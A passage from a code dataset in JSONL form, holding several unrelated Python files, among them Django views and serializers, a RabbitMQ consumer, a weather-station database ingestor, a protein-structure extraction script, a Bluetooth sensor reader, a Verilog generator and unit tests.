request_lines:\n            product = Product.objects.get(id=line[\"product\"])\n            amount = line[\"amount\"]\n            order_line, created = OrderLine.objects.get_or_create(order=instance, product=product,\n                                                                  defaults={'amount': amount,\n                                                                            'price': amount * product.price})\n            if not created:\n                order_line.amount = amount\n                order_line.price = amount * product.price\n                order_line.save()\n\n        return super(OrderSerializer, self).update(instance, validated_data)\n","sub_path":"dashboard/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":8486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"13515313","text":"\"\"\"Consumer\"\"\"\nimport pika\n### Create the socket: obtain a connection to the rabbitmq service; a virtual queue needs extra parameters ###\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\n### Create an AMQP channel ###\nchannel = connection.channel()\n### Declare the queue ###\nchannel.queue_declare(queue='hello') # the queue is named 'hello'\n### Define the callback function that handles messages ###\ndef callback(ch, method, properties, body):\n    print(\"[x] Received %r.\"%body)\n    print(\"Meaning of each callback argument:\") # ch: the channel instance; method: delivery parameters; properties: message properties\n    print(\"ch:{};\\nmethod:{};\\nproperties:{}\\n\".format(ch, method, properties))\n### Consume: tell rabbitmq to receive and process messages with the callback ###\nchannel.basic_consume(queue='hello',\n                      on_message_callback=callback, # the callback runs once a message body is received\n                      auto_ack=True) # auto-acknowledge enabled: sends the MQ server an ack meaning 'message received'\nprint(\"[*] Waiting for messages. To exit press CTRL+C\")\nchannel.start_consuming() # start the consuming loop","sub_path":"rabbitmq/02.direct_consumer.py","file_name":"02.direct_consumer.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"294510090","text":"from utils import *\nimport time\n\ndef firstline_checker(data_type):\n\n    info = info_return(data_type)\n    if info[\"skip_first\"]:\n        print(\"This dataset ({}) originally does not include a column header as its 1st line\".format(data_type))\n        time.sleep(1)\n\n    print(\"\\nFor train.csv, 1st line is :\")\n    with open(info[\"path\"]+\"/train.csv\",\"r\") as f:\n        for line in f:\n            print(line)\n            break\n\n    print(\"\\nFor test.csv, 1st line is :\")\n    with open(info[\"path\"]+\"/test.csv\",\"r\") as f2:\n        for line in f2:\n            print(line)\n            break\n\nif __name__==\"__main__\":\n    import argparse\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--data\",type=str,choices=[\"dbpedia\",\"agnews\",\"yahoo\",\"yelp\"])\n    args = parser.parse_args()\n\n    firstline_checker(args.data)\n","sub_path":"paper4/firstline_check.py","file_name":"firstline_check.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"570813981","text":"\"\"\"\nHit CoCoRaHS's website API for a listing of stations and add entries for\nanything new found\n\"\"\"\nfrom __future__ import print_function\nimport sys\n\nimport requests\nfrom pyiem.util import get_dbconn\n\n\ndef main():\n    \"\"\"Go Main Go\"\"\"\n    pgconn = get_dbconn('mesosite')\n    mcursor = pgconn.cursor()\n\n    state = sys.argv[1]\n\n    url = (\"http://data.cocorahs.org/cocorahs/export/\"\n           \"exportstations.aspx?State=%s&Format=CSV\"\n           \"&country=usa\") % (state,)\n    data = requests.get(url, timeout=30).content.decode('ascii').split(\"\\r\\n\")\n\n    # Find current stations\n    stations = []\n    sql = \"\"\"\n    SELECT id from stations WHERE network = '%sCOCORAHS' and ST_y(geom) > 0\n    and name is not null and name != '' \"\"\" % (state,)\n    mcursor.execute(sql)\n    for row in mcursor:\n        
stations.append(row[0])\n\n    # Process Header\n    header = {}\n    h = data[0].split(\",\")\n    for i, _h in enumerate(h):\n        header[_h] = i\n\n    if 'StationNumber' not in header:\n        sys.exit(0)\n\n    for row in data[1:]:\n        cols = row.split(\",\")  # split on the bare comma, matching the header split; values are stripped below\n        if len(cols) < 4:\n            continue\n        sid = cols[header[\"StationNumber\"]]\n        if sid in stations:\n            continue\n\n        name = cols[header[\"StationName\"]].strip().replace(\"'\", ' ')\n        cnty = cols[header[\"County\"]].strip().replace(\"'\", ' ')\n        lat = float(cols[header[\"Latitude\"]].strip())\n        lon = float(cols[header[\"Longitude\"]].strip())\n\n        if lat < 10 or lon > -60 or name == '':\n            continue\n\n        print((\"ADD COCORAHS SID:%s Name:%s County:%s %.3f %.3f\"\n               ) % (sid, name, cnty, lat, lon))\n\n        sql = \"\"\"\n        INSERT into stations(id, synop, name, state, country, network,\n        online, geom, county, plot_name, metasite)\n        VALUES ('%s', 99999, '%s', '%s', 'US', '%sCOCORAHS', 't',\n        'SRID=4326;POINT(%s %s)', '%s', '%s', 'f')\n        \"\"\" % (sid, name, state, state, lon, lat, cnty, name)\n        try:\n            mcursor = pgconn.cursor()\n            mcursor.execute(sql)\n            mcursor.close()\n            pgconn.commit()\n        except Exception as _exp:\n            mcursor.close()\n            pgconn.commit()\n            mcursor = pgconn.cursor()\n            sql = \"\"\"\n            UPDATE stations SET geom = 'SRID=4326;POINT(%s %s)',\n            name = '%s', plot_name = '%s'\n            WHERE id = '%s' and network = '%sCOCORAHS'\n            \"\"\" % (lon, lat, name, name, sid, state)\n            mcursor.execute(sql)\n            mcursor.close()\n            pgconn.commit()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"scripts/ingestors/cocorahs/cocorahs_stations.py","file_name":"cocorahs_stations.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"49808810","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf.urls import url\nfrom . 
import views\n\n\n\nurlpatterns = [\n    path('', views.dashboard, name='dashboard'),\n    path('academic/', views.academic_year, name='academic_year'),\n    path('academic/new', views.academic_new, name='academic_new'),\n\n    path('course/', views.course_list, name='course_list'),\n    path('course/new', views.course_new, name='course_new'),\n\n    path('subject/', views.subject_list, name='subject_list'),\n    path('subject/new', views.subject_new, name='subject_new'),\n\n    path('semester/', views.semester_list, name='semester_list'),\n    path('semester/new', views.semester_new, name='semester_new'),\n\n    path('attendence/', views.attendence_select, name='attendence_select'),\n    path('attendence/mark', views.attendence_mark, name='attendence_mark'),\n    path('attendence/view', views.attendence_view, name='attendence_view'),\n\n    path('student/profile/select/', views.student_select, name='student_select'),\n    path('student/profile/view/', views.student_profile, name='student_profile'),\n    # numeric id segments below are captured into the 'pk' kwarg\n    url(r'^student/profile/view/(?P<pk>\d+)/$', views.student_profile_roll, name='student_profile_roll'),\n    url(r'^student/profile/edit/(?P<pk>\d+)/$', views.student_profile_edit, name='student_profile_edit'),\n    path('student/profile/add/', views.student_profile_add, name='student_profile_add'),\n    path('profile/', views.my_profile, name='my_profile'),\n\n    path('notification/view/', views.notification_view, name = 'notification_view'),\n    url(r'^notification/edit/(?P<pk>\d+)/$', views.notification_edit, name='notification_edit'),\n    path('notification/add/', views.notification_add, name = 'notification_add'),\n    path('notification/student/view/', views.notification_student_view, name = 'notification_student_view'),\n    url(r'^notification/student/edit/(?P<pk>\d+)/$', views.notification_student_edit, name='notification_student_edit'),\n    path('notification/student/add/', views.notification_student_add, name = 'notification_student_add'),\n\n    path('seminar/add/', views.seminar_add, name = 'seminar_add'),\n    #url(r'^seminar/view/(?P<pk>\d+)/$', views.seminar_add, name='seminar_add'),\n\n    path('assignment/add/', views.assignment_add, name = 'assignment_add'),\n\n\n    path('project/add/', views.project_add, name = 'project_add'),\n    #url(r'^assignment/view/(?P<pk>\d+)/$', views.assignment_view, name='assignment_view'),\n\n    path('teacher/profile/add', views.teacher_profile_add, name = 'teacher_profile_add'),\n\n\n    path('uploads/view/', views.view_uploads, name = 'view_uploads'),\n    #url(r'^project/view/(?P<pk>\d+)/$', views.project_view, name='project_view'),\n    ]","sub_path":"CloudCampus/dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"514943256","text":"\"\"\"\r\nPurpose of this is to extract the relevant ATOM lines from the raw pdb/cif files and then save them into separate pdb files.\r\n\r\nEach pdb file corresponds to a specific chain in each RNA (as per the dataset).\r\n\"\"\"\r\n\r\nimport os\r\n\r\nmain_folder = r'D:\PHML B factor estimation\02 Project'\r\ninput_folder = r'01 Download and extract\01 Raw PDB files'\r\noutput_folder = r'01 Download and extract\02 Processed PDB files\C1-C1'\r\nlist_folder = r'00 Basic information'\r\n\r\n# Extract the list of pdb files downloaded\r\ninput_path = os.path.join(main_folder, input_folder)\r\npdb_files_extension = {}\r\nfor file in os.listdir(input_path):\r\n\tname, ext = file.split(\".\")\r\n\tpdb_files_extension[name] = ext\r\n\r\n# Extract the list of RNA proteins required (along 
with the residue type)\r\nsources = [\"Test_list\", \"Train_list\"]\r\nRNAproteins = []\r\nfor src in sources:\r\n\tlist_path = os.path.join(main_folder, list_folder, src)\r\n\twith open(list_path, \"r\") as list_file:  # use a context manager so the handle is closed\r\n\t\tRNAproteins.extend(list_file.read().split(\"\\n\")[:-1])\r\n\r\n# Split the above proteins and store RNA proteins and their residues in a dictionary\r\nRNAproteins_dict = {}\r\nfor chain in RNAproteins:\r\n\tRNA, residue = chain.split(\"_\")\r\n\tif RNA in RNAproteins_dict:\r\n\t\tRNAproteins_dict[RNA].append(residue)\r\n\t\t# A given RNA may have multiple residues, so the new one is appended rather than overwritten\r\n\telse:\r\n\t\tRNAproteins_dict[RNA] = [residue]\r\n\r\n# Extract the required ATOM lines from the pdb files and save them into separate pdb files\r\nfor chain in list(RNAproteins_dict.keys()):\r\n\tprint(\"Extracting ... %s\" %(chain))\r\n\r\n\t# Check if the pdb file was downloaded. Else, generate an empty pdb file with the 'Missing_' prefix\r\n\tif chain in pdb_files_extension.keys():\r\n\r\n\t\t# This portion is for pdb files\r\n\t\tif pdb_files_extension[chain] == \"pdb\":\r\n\t\t\tfor j in RNAproteins_dict[chain]:\r\n\r\n\t\t\t\t# Generate the input and output file names\r\n\t\t\t\tinput_filename = chain + \".pdb\"\r\n\t\t\t\toutput_filename = \"Extract_pdb_\" + chain + \"_\" + j + \".pdb\"\r\n\r\n\t\t\t\t# Input and output path\r\n\t\t\t\tinput_path = os.path.join(main_folder, input_folder, input_filename)\r\n\t\t\t\toutput_path = os.path.join(main_folder, output_folder, output_filename)\r\n\r\n\t\t\t\toldfile = open(input_path, \"r\")\r\n\t\t\t\tnewfile = open(output_path, \"w\")\r\n\r\n\t\t\t\t# Extract the residue lines\r\n\t\t\t\tfor line in oldfile:\r\n\t\t\t\t\tif line:\r\n\t\t\t\t\t\tif line[0:4] == \"ATOM\" and line[21] == j and line[13:16] == \"C1'\":\r\n\t\t\t\t\t\t\tnewfile.write(line)\r\n\r\n\t\t\t\toldfile.close()\r\n\t\t\t\tnewfile.close()\r\n\r\n\t\t# This portion is for cif files\r\n\t\telse:\r\n\t\t\tfor j in RNAproteins_dict[chain]:\r\n\r\n\t\t\t\t# Generate the input and output file names\r\n\t\t\t\tinput_filename = chain + \".cif\"\r\n\t\t\t\toutput_filename = \"Extract_cif_\" + chain + \"_\" + j + \".pdb\"\r\n\r\n\t\t\t\t# Input and output path\r\n\t\t\t\tinput_path = os.path.join(main_folder, input_folder, input_filename)\r\n\t\t\t\toutput_path = os.path.join(main_folder, output_folder, output_filename)\r\n\r\n\t\t\t\toldfile = open(input_path, \"r\")\r\n\t\t\t\tnewfile = open(output_path, \"w\")\r\n\r\n\t\t\t\t# Extract the residue lines\r\n\t\t\t\tfor line in oldfile:\r\n\t\t\t\t\tif line:\r\n\t\t\t\t\t\tif line[0:4] == \"ATOM\" and j in line[90:95].split(\" \") and line[18:21] == \"C1'\":\r\n\t\t\t\t\t\t\tnewfile.write(line)\r\n\r\n\t\t\t\toldfile.close()\r\n\t\t\t\tnewfile.close()\r\n\r\n\t# This portion is for missing pdb files\r\n\telse:\r\n\t\toutput_filename = \"Missing_\" + chain + \".pdb\"\r\n\t\toutput_path = os.path.join(main_folder, output_folder, output_filename)  # write the marker file into the output folder, not the cwd\r\n\t\tnewfile = open(output_path, \"w\")\r\n\t\tnewfile.close()\r\n\r\nprint(\"Extraction complete ...\")","sub_path":"01-Download-and-extract/02-Processed-PDB-files/01 Extract chain information C1-C1.py","file_name":"01 Extract chain information C1-C1.py","file_ext":"py","file_size_in_byte":3346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"428406400","text":"#!/usr/bin/env python\n\n# '.' 
Matches any single character.\n# '*' Matches zero or more of the preceding element.\n#\n# The matching should cover the entire input string (not partial).\n#\n# The function prototype should be:\n# bool isMatch(const char *s, const char *p)\n\nclass Solution(object):\n    def match(self, s, si, p, pi):\n        def charMatch(s, si, p, pi):\n            try:\n                return p[pi] in (s[si], '.')\n            except IndexError:  # si or pi ran past the end of its string\n                return False\n\n        def starMatch(t, s, si, p, pi):\n            return self.match(s, si, p, pi) or (charMatch(s, si, t, 0) and starMatch(t, s, si+1, p, pi))\n\n        if si == len(s) and pi == len(p):\n            return True\n\n        if pi+1 < len(p) and p[pi+1] == '*':\n            return starMatch(p[pi], s, si, p, pi+2)\n        if charMatch(s, si, p, pi):\n            return self.match(s, si+1, p, pi+1)\n        return False\n\n    def real_pattern(self, p):\n        # Drop consecutive duplicate 'x*' units ('a*a*' -> 'a*'); they match the same strings and only slow the recursion\n        index = 0\n        real_pattern_list = []\n        prev_glob_char = None\n\n        while index < len(p):\n            if index+1 < len(p) and p[index+1] == '*':\n                if prev_glob_char != p[index]:\n                    prev_glob_char = p[index]\n                    real_pattern_list.append(p[index:index+2])\n                index += 2\n            else:\n                prev_glob_char = None\n                real_pattern_list.append(p[index])\n                index += 1\n\n        return ''.join(real_pattern_list)\n\n    def isMatch(self, s, p):\n        \"\"\"\n        :type s: str\n        :type p: str\n        :rtype: bool\n        \"\"\"\n        return self.match(s, 0, self.real_pattern(p), 0)\n","sub_path":"10.Regular_Expression_Matching.py","file_name":"10.Regular_Expression_Matching.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"128963347","text":"import binascii\nimport struct\nfrom bluepy import btle\n\n\nclass EmoPlus:\n\n    service_battery_uuid = \"0000180f-0000-1000-8000-00805f9b34fb\"\n    service_pm2dot5_uuid = \"0000fff0-0000-1000-8000-00805f9b34fb\"\n    \n    def __init__(self, addr):\n        self.addr = addr\n        self.conn = btle.Peripheral()\n        self.connected = False\n    \n    def connect(self):\n        try:\n            self.conn.connect(self.addr)\n            self.connected = True\n\n            self.service_battery = self.conn.getServiceByUUID(self.service_battery_uuid)\n            self.service_pm2dot5 = self.conn.getServiceByUUID(self.service_pm2dot5_uuid)\n        except btle.BTLEException as e:\n            raise RuntimeError(e)\n    \n    def disconnect(self):\n        self.conn.disconnect()\n        self.connected = False\n    \n    def get_battery_level(self):\n        try:\n            battery_ch = self.service_battery.getCharacteristics(forUUID='00002a19-0000-1000-8000-00805f9b34fb')[0]\n            value = battery_ch.read()\n            return struct.unpack('B', value)[0]\n        except btle.BTLEException as e:\n            raise RuntimeError(e)\n    \n    def warm_up(self):\n        try:\n            cmd_ch = self.service_pm2dot5.getCharacteristics(forUUID='0000fff3-0000-1000-8000-00805f9b34fb')[0]\n            value = cmd_ch.read()\n        except btle.BTLEException as e:\n            raise RuntimeError(e)\n\n    def get_haze_value(self):\n        \n        try:\n            value_ch = self.service_pm2dot5.getCharacteristics(forUUID='0000fff2-0000-1000-8000-00805f9b34fb')[0]\n            \n            value = value_ch.read()\n            print('value=%s' % binascii.b2a_hex(value))\n            \n            c1 = bytes(value[10:12])\n            c2 = bytes(value[12:14])\n            print('c1=%s, c2=%s' % (binascii.b2a_hex(c1), binascii.b2a_hex(c2)))\n            \n            a = struct.unpack('B', c1[1:])[0]\n            b = struct.unpack('B', c1[:1])[0]\n            density = int((b << 8) | (a & 0xff)) * 1.265\n\n            a = struct.unpack('B', c2[1:])[0]\n            b = struct.unpack('B', c2[:1])[0]\n            count = (int((a & 0xff) << 0) + int((b & 0xff) << 8)) * 2.56\n            if count < 0:\n                count = 0\n\n            print('%d ug/m3, %d 0.3um' % (density, count))\n            return count, density\n        \n        except btle.BTLEException as e:\n            raise 
RuntimeError(e)\n","sub_path":"emo_plus.py","file_name":"emo_plus.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"213852906","text":"from veriloggen import *\n\nfrom common.make_fifo import make_fifo\n\n\ndef make_output_queue_controller(conf_receiver):\n    m = Module('fdam_output_queue_controller')\n    ID_QUEUE = m.Parameter('ID_QUEUE', 0)\n    ADDR_WIDTH = m.Parameter('ADDR_WIDTH', 64)\n    QTD_WIDTH = m.Parameter('QTD_WIDTH', 32)\n    DATA_WIDTH = m.Parameter('DATA_WIDTH', 512)\n    CONF_ID_QUEUE_WIDTH = m.Parameter('CONF_ID_QUEUE_WIDTH', 32)\n    TAG_WIDTH = m.Parameter('TAG_WIDTH', 16)\n\n    clk = m.Input('clk')\n    rst = m.Input('rst')\n    start = m.Input('start')\n\n    conf_valid = m.Input('conf_valid', 2)\n    conf = m.Input('conf', EmbeddedCode('ADDR_WIDTH + QTD_WIDTH + CONF_ID_QUEUE_WIDTH'))\n\n    available_write = m.Input('available_write')\n    has_wr_peding = m.OutputReg('has_wr_peding')\n    request_write = m.OutputReg('request_write')\n    write_data = m.OutputReg('write_data', DATA_WIDTH + ADDR_WIDTH + TAG_WIDTH)\n\n    write_data_valid = m.Input('write_data_valid')\n    write_queue_id = m.Input('write_queue_id', TAG_WIDTH)\n\n    acc_user_available_write = m.Output('acc_user_available_write')\n    acc_user_request_write = m.Input('acc_user_request_write')\n    acc_user_write_data = m.Input('acc_user_write_data', DATA_WIDTH)\n    acc_user_done = m.Input('acc_user_done')\n\n    done = m.OutputReg('done')\n\n    FIFO_DEPTH_BITS = m.Localparam('FIFO_DEPTH_BITS', 10)\n    FIFO_FULL = m.Localparam('FIFO_FULL', EmbeddedCode('2 ** FIFO_DEPTH_BITS'))\n    CONF_TYPE_OUT_DATA = m.Localparam('CONF_TYPE_OUT_DATA', 2)\n\n    conf_ready = m.Reg('conf_ready')\n    addr_base = m.Reg('addr_base', ADDR_WIDTH)\n    addr_write_next = m.Reg('addr_write_next', ADDR_WIDTH)\n    qtd_data_cl = m.Reg('qtd_data_cl', QTD_WIDTH)\n    count_req_cl = m.Reg('count_req_cl', QTD_WIDTH)\n    count_req_cl_align = m.Reg('count_req_cl_align', QTD_WIDTH)\n    count_cl = m.Reg('count_cl', QTD_WIDTH)\n    write_peding = m.Reg('write_peding', 16)\n    flag_addr_init = m.Reg('flag_addr_init')\n    fifo_re = m.Reg('fifo_re')\n    issue_req_data = m.Wire('issue_req_data')\n    fifo_empty = m.Wire('fifo_empty')\n    fifo_count = m.Wire('fifo_count', FIFO_DEPTH_BITS + 1)\n    fifo_full = m.Wire('fifo_full')\n    fifo_almostfull = m.Wire('fifo_almostfull')\n    fifo_almostempty = m.Wire('fifo_almostempty')\n    write_data_valid_queue = m.Wire('write_data_valid_queue')\n    fifo_dout_valid = m.Wire('fifo_dout_valid')\n    fifo_dout = m.Wire('fifo_dout', DATA_WIDTH)\n    end_req_wr_data = m.Wire('end_req_wr_data')\n    conf_rd_valid = m.Wire('conf_rd_valid')\n    conf_rd = m.Wire('conf_rd', EmbeddedCode(ADDR_WIDTH + QTD_WIDTH + CONF_ID_QUEUE_WIDTH))\n    rst_internal = m.Wire('rst_internal')\n    align_write_data = m.Wire('align_write_data')\n\n    params = [('CONF_TYPE', CONF_TYPE_OUT_DATA), ('CONF_ID', ID_QUEUE), ('CONF_ID_WIDTH', CONF_ID_QUEUE_WIDTH),\n              ('CONF_WIDTH', EmbeddedCode('ADDR_WIDTH + QTD_WIDTH + CONF_ID_QUEUE_WIDTH'))]\n    con = [('clk', clk), ('rst', rst), ('conf_in_valid', conf_valid), ('conf_in_data', conf),\n           ('conf_out_valid', conf_rd_valid),\n           ('conf_out_data', conf_rd), ('conf_reset_out', rst_internal)]\n    m.Instance(conf_receiver, 'conf_receiver', params, con)\n\n    fifo = make_fifo()\n    params = [('FIFO_WIDTH', DATA_WIDTH), ('FIFO_DEPTH_BITS', FIFO_DEPTH_BITS),\n              ('FIFO_ALMOSTFULL_THRESHOLD', FIFO_FULL - 4), ('FIFO_ALMOSTEMPTY_THRESHOLD', 2)]\n    con = [('clk', clk), ('rst', rst_internal), ('we', acc_user_request_write), ('din', 
acc_user_write_data),\n ('re', fifo_re), ('valid', fifo_dout_valid), ('dout', fifo_dout), ('count', fifo_count),\n ('empty', fifo_empty), ('full', fifo_full), ('almostfull', fifo_almostfull),\n ('almostempty', fifo_almostempty)]\n m.Instance(fifo, 'fifo', params, con)\n\n end_req_wr_data.assign((count_req_cl >= qtd_data_cl))\n issue_req_data.assign(AndList(start & conf_ready & ~end_req_wr_data & available_write,\n Mux(fifo_almostempty, (~fifo_empty & ~fifo_re), Int(1, 1, 2))))\n acc_user_available_write.assign(~fifo_almostfull)\n write_data_valid_queue.assign(AndList(write_data_valid, (write_queue_id == ID_QUEUE)))\n align_write_data.assign(\n AndList(fifo_empty, acc_user_done, ~acc_user_request_write, (count_req_cl_align[0] | count_req_cl_align[1])))\n\n m.Always(Posedge(clk))(\n If(rst_internal)(\n done(Int(0, 1, 2)),\n has_wr_peding(Int(0, 1, 2))\n ).Else(\n done(AndList((count_cl >= qtd_data_cl), start, conf_ready)),\n has_wr_peding(Mux(write_peding > 0, Int(1, 1, 2), Int(0, 1, 2)))\n )\n )\n\n m.Always(Posedge(clk))(\n If(rst_internal)(\n addr_base(0),\n qtd_data_cl(0),\n conf_ready(Int(0, 1, 2)),\n ).Else(\n If(conf_rd_valid)(\n conf_ready(Int(1, 1, 2)),\n qtd_data_cl(conf_rd[CONF_ID_QUEUE_WIDTH:CONF_ID_QUEUE_WIDTH + QTD_WIDTH]),\n addr_base(conf_rd[CONF_ID_QUEUE_WIDTH + QTD_WIDTH:CONF_ID_QUEUE_WIDTH + QTD_WIDTH + ADDR_WIDTH]),\n )\n )\n )\n\n m.Always(Posedge(clk))(\n If(rst_internal)(\n addr_write_next(0),\n flag_addr_init(Int(1, 1, 2))\n ).Else(\n If(conf_ready & flag_addr_init)(\n addr_write_next(addr_base),\n flag_addr_init(Int(0, 1, 2))\n ).Elif(fifo_dout_valid | align_write_data)(\n addr_write_next(addr_write_next + 1)\n )\n )\n )\n\n m.Always(Posedge(clk))(\n If(rst_internal)(\n count_cl(0),\n ).Else(\n If(write_data_valid_queue)(\n count_cl(count_cl + 4)\n )\n )\n )\n\n m.Always(Posedge(clk))(\n If(rst_internal)(\n fifo_re(Int(0, 1, 2)),\n count_req_cl(0),\n count_req_cl_align(0)\n ).Else(\n fifo_re(Int(0, 1, 2)),\n If(issue_req_data)(\n fifo_re(Int(1, 1, 2)),\n count_req_cl(count_req_cl + 1),\n count_req_cl_align(count_req_cl_align + 1)\n ).Elif(align_write_data & ~fifo_dout_valid)(\n count_req_cl(count_req_cl + 1),\n count_req_cl_align(count_req_cl_align + 1)\n )\n )\n )\n\n m.Always(Posedge(clk))(\n If(rst_internal)(\n write_peding(0)\n ).Else(\n Case(Cat(write_data_valid_queue, (fifo_dout_valid | align_write_data)))(\n When(Int(0, 2, 10))(\n write_peding(write_peding)\n ),\n When(Int(1, 2, 10))(\n write_peding(write_peding + 1)\n ),\n When(Int(2, 2, 10))(\n write_peding(write_peding - 4)\n ),\n When(Int(3, 2, 10))(\n write_peding(write_peding - 3)\n )\n )\n )\n )\n\n m.Always(Posedge(clk))(\n If(rst_internal)(\n request_write(Int(0, 1, 2)),\n ).Else(\n request_write(Int(0, 1, 2)),\n If(fifo_dout_valid | align_write_data)(\n request_write(Int(1, 1, 2))\n )\n )\n )\n m.Always(Posedge(clk))(\n write_data(Cat(fifo_dout, addr_write_next, ID_QUEUE[0:TAG_WIDTH]))\n )\n\n return m\n\n# make_output_queue_controller().to_verilog('output_queue_controller_test')\n","sub_path":"fdam-hw-generator/src/fdam_acc/make_output_queue_controller.py","file_name":"make_output_queue_controller.py","file_ext":"py","file_size_in_byte":7368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"237131709","text":"\nimport unittest\nimport random\n\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport lorem\nfrom tqdm import tqdm\n\nfrom tfkld import _get_counts, _kld, _apply_weight\n\n\ndef _test_counts(p1, p2, 
labels):\n    \"\"\"\n    Runs the original slow pure-Python reference implementation\n    \"\"\"\n    nrows, ncols = p1.shape\n    count = np.ones((4, ncols))\n    for row in tqdm(range(nrows)):\n        label = labels[row]\n        for d in range(ncols):\n            if ((p1[row, d] > 0.) and (p2[row, d] == 0.)) \\\n               or ((p1[row, d] == 0.) and (p2[row, d] > 0.)):\n                if label == 0:\n                    count[0, d] += 1.0\n                elif label == 1:\n                    count[2, d] += 1.0\n            elif (p1[row, d] > 0) and (p2[row, d] > 0):\n                if label == 0:\n                    count[1, d] += 1.0\n                elif label == 1:\n                    count[3, d] += 1.0\n    return count\n\n\ndef _test_kld(counts, smoothing):\n    # smoothing\n    counts += smoothing\n    # normalize\n    pattern = [[1, 1, 0, 0], [1, 1, 0, 0], [0, 0, 1, 1], [0, 0, 1, 1]]\n    pattern = np.array(pattern)\n    prob = counts / (pattern.dot(counts))\n    # kl\n    ratio = np.log((prob[0:2, :] / prob[2:4, :]) + 1e-7)\n    weight = (ratio * prob[0:2, :]).sum(axis=0)\n    return weight\n\n\nclass TestTFKLD(unittest.TestCase):\n    @classmethod\n    def setUpClass(cls):\n        p1, p2, labels = [], [], []\n        for _ in range(100):\n            p1.append(lorem.sentence())\n            p2.append(lorem.sentence())\n            labels.append(random.randint(0, 1))\n\n        vec = CountVectorizer(dtype=np.float64).fit(p1 + p2)  # np.float was removed in NumPy 1.24; use the concrete dtype\n        cls.p1, cls.p2 = vec.transform(p1), vec.transform(p2)\n        cls.labels = np.array(labels)\n\n    def test_counting(self):\n        labels, p1, p2 = TestTFKLD.labels, TestTFKLD.p1, TestTFKLD.p2\n\n        print(\"Testing counting...\")\n        counts1 = _get_counts(p1, p2, labels)\n        counts2 = _test_counts(p1, p2, labels)\n        self.assertTrue(np.all(counts1 == counts2), \"Counting methods\")\n\n        print(\"Testing weight\")\n        weight1 = _kld(counts1, 0.05)\n        weight2 = _test_kld(counts2, 0.05)\n        self.assertTrue(np.allclose(weight1, weight2), \"Weight methods\")\n\n        print(\"Testing weighting\")\n        # transform using fast method\n        weighted1 = _apply_weight(weight1, p1)\n        # transform using original method (row-wise)\n        weighted2 = p1.copy()\n        for i in range(weighted2.shape[0]):\n            weighted2[i, :] = weighted2[i, :].multiply(weight2)\n\n        self.assertTrue(np.allclose(weighted1.todense(), weighted2.todense()),\n                        \"Weighted results\")\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}